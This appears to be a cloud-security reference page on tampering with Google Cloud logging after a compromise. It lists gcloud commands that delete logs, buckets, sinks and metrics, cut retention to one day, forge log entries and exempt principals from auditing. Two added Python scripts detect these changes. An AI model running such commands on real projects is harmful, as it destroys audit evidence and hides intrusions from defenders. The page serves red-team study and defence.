# GCP - Logging Post Exploitation

> [!TIP]
> Learn & practice AWS Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
> Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)\
> Learn & practice Azure Hacking: [**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)
>
> <details>
>
> <summary>Support HackTricks</summary>
>
> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>

## Basic Information

For more information check:

GCP - Logging Enum

For other ways to disrupt monitoring check:

GCP - Monitoring Post Exploitation

## Default Logging

By default you won't be discovered just for performing read-only actions: only Admin Activity audit logs are always written, while the Data Access audit logs that would record reads are disabled by default (BigQuery being the exception). For more information check the Logging Enum section.

## Add excluded principal

In https://console.cloud.google.com/iam-admin/audit/allservices and https://console.cloud.google.com/iam-admin/audit it's possible to add principals as exempted members of the Data Access audit configuration, so their actions generate no audit log entries. An attacker could abuse this to avoid being discovered.
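From the defender's side, the exemptions described above live in the project IAM policy's `auditConfigs` block, so they can be reviewed from a policy export rather than by clicking through the console. The following Python is an added example (not part of the original page or of any Google tooling) that parses a constructed `gcloud projects get-iam-policy --format=json` style document, lists every exempted principal, and reports which Data Access log types are not enabled for a service; the project, member names and etag in the sample are invented.

```python
import json

# Constructed sample in the shape returned by
#   gcloud projects get-iam-policy PROJECT_ID --format=json
# Only auditConfigs matters here; the project, members and etag are invented.
SAMPLE_POLICY = json.loads("""
{
  "auditConfigs": [
    {
      "service": "allServices",
      "auditLogConfigs": [
        {"logType": "ADMIN_READ"},
        {"logType": "DATA_READ",
         "exemptedMembers": ["user:exempted-user@example.com"]},
        {"logType": "DATA_WRITE"}
      ]
    },
    {
      "service": "storage.googleapis.com",
      "auditLogConfigs": [
        {"logType": "DATA_WRITE",
         "exemptedMembers": ["serviceAccount:backup@example-project.iam.gserviceaccount.com"]}
      ]
    }
  ],
  "bindings": [],
  "etag": "BwXexample",
  "version": 1
}
""")

# Admin Activity audit logs are always on; these are the three configurable Data Access types.
DATA_ACCESS_LOG_TYPES = {"ADMIN_READ", "DATA_READ", "DATA_WRITE"}


def find_audit_exemptions(policy):
    """Return (service, logType, member) for every principal exempted from audit logging.

    Each entry is a principal whose matching API calls produce no Data Access
    audit log entry at all, i.e. exactly what the console pages above let you add.
    """
    findings = []
    for cfg in policy.get("auditConfigs", []):
        service = cfg.get("service", "")
        for log_cfg in cfg.get("auditLogConfigs", []):
            for member in log_cfg.get("exemptedMembers", []):
                findings.append((service, log_cfg.get("logType", ""), member))
    return findings


def missing_log_types(policy, service="allServices"):
    """Return the Data Access log types NOT enabled for `service` (empty list = all on).

    The per-service configuration is merged with the allServices one, so a
    type enabled under allServices counts as enabled for every service.
    """
    enabled = set()
    for cfg in policy.get("auditConfigs", []):
        if cfg.get("service") in ("allServices", service):
            enabled |= {c.get("logType") for c in cfg.get("auditLogConfigs", [])}
    return sorted(DATA_ACCESS_LOG_TYPES - enabled)


if __name__ == "__main__":
    for service, log_type, member in find_audit_exemptions(SAMPLE_POLICY):
        print(f"EXEMPTED  {member:70} {service}/{log_type}")
    print("missing for allServices:", missing_log_types(SAMPLE_POLICY) or "none")
```

Run it against a real export by replacing `SAMPLE_POLICY` with `json.load(open("policy.json"))`; any line printed as `EXEMPTED` is a principal whose reads or writes never reach the audit log and should be justified or removed.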

### Read logs - `logging.logEntries.list`

<details>

<summary>Read log entries</summary>
```bash
# Read logs
gcloud logging read "logName=projects/your-project-id/logs/log-id" --limit=10 --format=json

# Everything from a timestamp
gcloud logging read 'timestamp >= "2023-01-01T00:00:00Z"' --limit=10 --format=json

# Use these options to indicate a different bucket or view to use:
#   --bucket=_Required --view=_Default
```
</details>

### `logging.logs.delete`

<details>

<summary>Delete log entries</summary>
```bash
# Delete all entries from a log in the _Default log bucket - logging.logs.delete
gcloud logging logs delete <log-name>
```
</details>
### Write logs - `logging.logEntries.create`

<details>

<summary>Write a log entry</summary>
```bash
# Write a log entry to try to disrupt some system
gcloud logging write LOG_NAME "A deceptive log entry" --severity=ERROR
```
</details>

### `logging.buckets.update`

<details>

<summary>Update log bucket retention</summary>
```bash
# Set retention period to 1 day (_Required has a fixed one of 400 days)
gcloud logging buckets update bucketlog --location=<location> --description="New description" --retention-days=1
```
</details>

### `logging.buckets.delete`

<details>

<summary>Delete log bucket</summary>
```bash
# Delete log bucket
gcloud logging buckets delete BUCKET_NAME --location=<location>
```
</details>

### `logging.links.delete`

<details>

<summary>Delete log link</summary>
```bash
# Delete link
gcloud logging links delete <LINK_ID> --bucket=<BUCKET_NAME> --location=<location>
```
</details>

### `logging.views.delete`

<details>

<summary>Delete logging view</summary>
```bash
# Delete a logging view to remove access from anyone using it
gcloud logging views delete <VIEW_ID> --bucket=<BUCKET_NAME> --location=global
```
</details>

### `logging.views.update`

<details>

<summary>Update logging view to hide data</summary>
```bash
# Update a logging view to hide data
gcloud logging views update <VIEW_ID> --log-filter="resource.type=gce_instance" --bucket=<BUCKET_NAME> --location=global --description="New description for the log view"
```
</details>

### `logging.logMetrics.update`

<details>

<summary>Update log-based metrics</summary>
```bash
# Update log based metrics - logging.logMetrics.update
gcloud logging metrics update <METRIC_NAME> --description="Changed metric description" --log-filter="severity>CRITICAL" --project=PROJECT_ID
```
</details>

### `logging.logMetrics.delete`

<details>

<summary>Delete log-based metrics</summary>
```bash
# Delete log based metrics - logging.logMetrics.delete
gcloud logging metrics delete <METRIC_NAME>
```
</details>

### `logging.sinks.delete`

<details>

<summary>Delete log sink</summary>
```bash
# Delete sink - logging.sinks.delete
gcloud logging sinks delete <SINK_NAME>
```
</details>

### `logging.sinks.update`

<details>

<summary>Update/disrupt log sink</summary>
```bash
# Disable sink - logging.sinks.update
gcloud logging sinks update <SINK_NAME> --disabled

# Create a filter to exclude attacker logs - logging.sinks.update
gcloud logging sinks update SINK_NAME --add-exclusion="name=exclude-info-logs,filter=severity<INFO"

# Change where the sink is storing the data - logging.sinks.update
gcloud logging sinks update <SINK_NAME> <new-destination>

# Change the service account to one without permissions to write in the destination - logging.sinks.update
gcloud logging sinks update SINK_NAME --custom-writer-identity=attacker-service-account-email --project=PROJECT_ID

# Remove exclusions to try to overload with logs - logging.sinks.update
gcloud logging sinks update SINK_NAME --clear-exclusions

# If the sink exports to BigQuery, an attacker might enable or disable the use of partitioned tables,
# potentially leading to inefficient querying and higher costs. - logging.sinks.update
gcloud logging sinks update SINK_NAME --use-partitioned-tables
gcloud logging sinks update SINK_NAME --no-use-partitioned-tables
```
</details>
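The sink and bucket changes above all leave a visible trace in the project's current logging configuration, so a defender can catch them by diffing live state against a known-good snapshot instead of waiting for an alert. The following Python is an added example (not code from the original page or from Google) that audits records in the shape of `gcloud logging sinks list --format=json` and `gcloud logging buckets list --format=json`: disabled sinks, added exclusions, changed destination or writer identity, sinks that disappeared, lowered retention and buckets pending deletion. The sink records, the baseline snapshot, the project number and every email address are constructed samples.

```python
# Live input would come from:
#   gcloud logging sinks list   --project=PROJECT_ID --format=json > sinks.json
#   gcloud logging buckets list --project=PROJECT_ID --format=json > buckets.json
# Everything below is a constructed sample in that shape; names and emails are invented.
LOGGING_SA = "serviceAccount:service-123456789012@gcp-sa-logging.iam.gserviceaccount.com"

SAMPLE_SINKS = [
    {"name": "_Required",
     "destination": "logging.googleapis.com/projects/example-project/locations/global/buckets/_Required",
     "writerIdentity": LOGGING_SA},
    {"name": "_Default",
     "destination": "logging.googleapis.com/projects/example-project/locations/global/buckets/_Default",
     "writerIdentity": LOGGING_SA,
     "disabled": True},                                   # tampered: sink switched off
    {"name": "siem-export",
     "destination": "pubsub.googleapis.com/projects/example-project/topics/siem",
     "writerIdentity": "serviceAccount:rogue-sa@example-project.iam.gserviceaccount.com",  # tampered
     "exclusions": [{"name": "exclude-info-logs", "filter": "severity<INFO"}]},            # tampered
]

# Known-good snapshot taken when the sinks were last reviewed (constructed).
BASELINE_SINKS = {
    "_Required": {"destination": SAMPLE_SINKS[0]["destination"], "writerIdentity": LOGGING_SA},
    "_Default": {"destination": SAMPLE_SINKS[1]["destination"], "writerIdentity": LOGGING_SA},
    "siem-export": {"destination": "pubsub.googleapis.com/projects/example-project/topics/siem",
                    "writerIdentity": "serviceAccount:log-export@example-project.iam.gserviceaccount.com"},
    "archive-to-gcs": {"destination": "storage.googleapis.com/example-project-log-archive",
                       "writerIdentity": LOGGING_SA},     # present in baseline, gone from live state
}

SAMPLE_BUCKETS = [
    {"name": "projects/example-project/locations/global/buckets/_Required",
     "retentionDays": 400, "locked": True, "lifecycleState": "ACTIVE"},
    {"name": "projects/example-project/locations/global/buckets/_Default",
     "retentionDays": 1, "lifecycleState": "ACTIVE"},                     # tampered: 30 -> 1
    {"name": "projects/example-project/locations/global/buckets/forensics",
     "retentionDays": 365, "locked": False, "lifecycleState": "DELETE_REQUESTED"},  # tampered
]


def audit_sinks(sinks, baseline):
    """Return (sink_name, finding) pairs for every deviation from the baseline."""
    findings = []
    seen = set()
    for sink in sinks:
        name = sink.get("name", "")
        seen.add(name)
        if sink.get("disabled"):
            findings.append((name, "sink is disabled"))
        for ex in sink.get("exclusions", []):
            findings.append((name, f"exclusion {ex.get('name')!r} drops entries matching {ex.get('filter')!r}"))
        expected = baseline.get(name)
        if expected is None:
            findings.append((name, "sink not in baseline"))
            continue
        if sink.get("destination") != expected["destination"]:
            findings.append((name, f"destination changed to {sink.get('destination')}"))
        if sink.get("writerIdentity") != expected["writerIdentity"]:
            findings.append((name, f"writer identity changed to {sink.get('writerIdentity')}"))
    for name in baseline:
        if name not in seen:
            findings.append((name, "sink in baseline is missing"))
    return findings


def audit_buckets(buckets, min_retention_days=30):
    """Flag buckets pending deletion or retaining less than min_retention_days."""
    findings = []
    for bucket in buckets:
        name = bucket.get("name", "").rsplit("/", 1)[-1]
        state = bucket.get("lifecycleState", "ACTIVE")
        if state != "ACTIVE":
            findings.append((name, f"lifecycle state {state}"))
        days = bucket.get("retentionDays", 30)   # _Default's built-in default is 30 days
        if days < min_retention_days:
            findings.append((name, f"retention set to {days} days (minimum {min_retention_days})"))
    return findings


if __name__ == "__main__":
    for name, finding in audit_sinks(SAMPLE_SINKS, BASELINE_SINKS) + audit_buckets(SAMPLE_BUCKETS):
        print(f"{name:16} {finding}")
```

Running this on a schedule (or from a Cloud Function triggered by the `UpdateSink`/`UpdateBucket` audit events) turns each trick in this section into a concrete finding; locking the buckets you rely on (`gcloud logging buckets update ... --locked`) additionally prevents the retention from being lowered at all.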
